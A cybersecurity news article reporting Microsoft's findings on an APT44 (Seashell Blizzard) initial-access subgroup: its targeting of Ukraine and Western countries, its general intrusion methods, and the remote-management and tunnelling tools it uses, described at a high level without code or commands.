Microsoft's earliest observations of the subgroup's activity show opportunistic operations targeting Ukraine, Europe, Central and South Asia, and the Middle East, focusing on critical sectors. Microsoft's Threat Intelligence team says that the actor is dedicated to achieving initial access to target systems, establishing persistence, and maintaining presence to allow other APT44 subgroups with post-compromise expertise to take over. By 2023, the subgroup's targeting scope had broadened, conducting large-scale compromises across Europe, the United States, and the Middle East, and in 2024, it started focusing on the United States, United Kingdom, Canada, and Australia. Starting 2022, following Russia's invasion of Ukraine, the subgroup intensified its operations against critical infrastructure supporting Ukraine, including government, military, transportation, and logistics sectors. The APT44 subgroup employs multiple techniques to compromise networks, including exploiting n-day vulnerabilities in internet-facing infrastructure, credential theft, and supply chain attacks. In 2024, the APT44 subgroup started to use legitimate IT remote management tools such as Atera Agent and Splashtop Remote Services to execute commands on compromised systems while posing as IT admins to evade detection. "We have also observed the initial access subgroup to pursue access to an organization prior to a Seashell Blizzard-linked destructive attack," reads a Microsoft report shared with BleepingComputer. "We assess that the subgroup has likely enabled at least three destructive cyberattacks in Ukraine since 2023," mentions Microsoft regarding the subgroup's specific activity. Regarding the post-initial access activity, the threat actors use Procdump or the Windows registry to steal credentials, and Rclone, Chisel, and Plink for data exfiltration through covert network tunnels. Microsoft says that the Russian hacker subgroup has "near-global reach" and helps Seashell Blizzard expand its geographical targeting. Supply-chain attacks were particularly effective against organizations across Europe and Ukraine, where the hackers targeted regionally managed IT service providers and then accessed multiple clients. Finally, the subgroup performs lateral movement to reach all the parts of the network it can, and modifies the infrastructure as required for its operations. In the report published today, the researchers share hunting queries, indicators of compromise (IoCs), and YARA rules for defenders to catch this threat actor's activity and stop it before . Bill Toulas Bill Toulas is a tech writer and infosec news reporter with over a decade of experience working on various online publications, covering open-source, Linux, malware, data breach incidents, and hacks.
This Cyber News was published on www.bleepingcomputer.com. Publication date: Wed, 12 Feb 2025 19:39:16 +0000